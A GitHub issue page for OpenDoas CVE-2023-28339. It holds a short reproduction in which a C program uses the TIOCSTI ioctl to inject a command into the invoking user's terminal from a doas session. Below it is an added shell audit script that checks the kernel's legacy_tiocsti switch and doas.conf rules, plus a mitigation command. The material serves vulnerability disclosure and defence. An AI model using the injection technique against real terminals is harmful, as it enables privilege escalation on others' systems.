CVE-2023-28339: security vulnerability: TIOCSTI tty character injection · Issue #106 · Duncaen/OpenDoas
OpenDoas through 6.8.2, when TIOCSTI is available, allows privilege escalation because of sharing a terminal with the original session. NOTE: TIOCSTI is unavailable in OpenBSD 6.0 and later, and can be made unavailable in the Linux kernel 6.2 and later.
I would like to confirm that OpenDoas 6.8.2 is affected. To reproduce, I did this:
```console
$ sudo tee -a /etc/doas.conf <<<"permit nopass ${USER} as nobody # added by ${USER} on $(date -I)"
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>

int main(void) {
    const char *text = "id\n";
    while (*text)
        ioctl(0, TIOCSTI, text++);
    return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ doas -u nobody /tmp/TIOCSTI # runs id(1) as ${USER}/${DOAS_USER} rather than nobody
```
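A host-side check for the two conditions the CVE text names, added here as an example that is not part of the original issue or of OpenDoas: whether the Linux 6.2+ TIOCSTI switch is off, and which `doas.conf` permit rules can run a command as a non-root user on the caller's terminal. Assumptions: the switch is read from `/proc/sys/dev/tty/legacy_tiocsti` (the Linux sysctl `dev.tty.legacy_tiocsti`), the function names are hypothetical, and the `doas.conf` parsing is simplified (no quoted strings or line continuations).

```shell
#!/bin/sh
# Added audit sketch, not OpenDoas code. File paths are parameters so the
# functions can be run against copies of the real files.

# State of the Linux 6.2+ switch for unprivileged TIOCSTI.
tiocsti_state() {
    f=${1:-/proc/sys/dev/tty/legacy_tiocsti}
    if [ ! -r "$f" ]; then
        echo "no-switch"        # knob absent: kernel predates 6.2 or is not Linux
        return 0
    fi
    case $(cat "$f") in
        0) echo "disabled" ;;
        *) echo "enabled" ;;
    esac
}

# Print "<line>: <target>" for each permit rule whose target is not root.
doas_nonroot_targets() {
    awk '
        { sub(/#.*/, "") }                  # drop comments
        $1 != "permit" { next }             # skip deny rules and blank lines
        {
            target = "any"                  # doas.conf(5): no "as" means all users
            for (i = 2; i <= NF; i++) {
                if ($i == "cmd") break      # words after cmd are command text
                if ($i == "as" && i < NF) { target = $(i + 1); break }
            }
            if (target != "root") print NR ": " target
        }
    ' "${1:-/etc/doas.conf}"
}

# Combine both checks into a short report.
tiocsti_report() {
    state=$(tiocsti_state "$1")
    rules=$(doas_nonroot_targets "$2")
    if [ "$state" != "disabled" ] && [ -n "$rules" ]; then
        echo "review: tiocsti=$state, doas rules with non-root targets:"
        echo "$rules"
    else
        echo "no finding: tiocsti=$state"
    fi
}

if [ "${1:-}" = "--host" ]; then tiocsti_report "" ""; fi
```

Run with `--host` to check the live system. On Linux 6.2 and later, `sysctl -w dev.tty.legacy_tiocsti=0` turns the switch off.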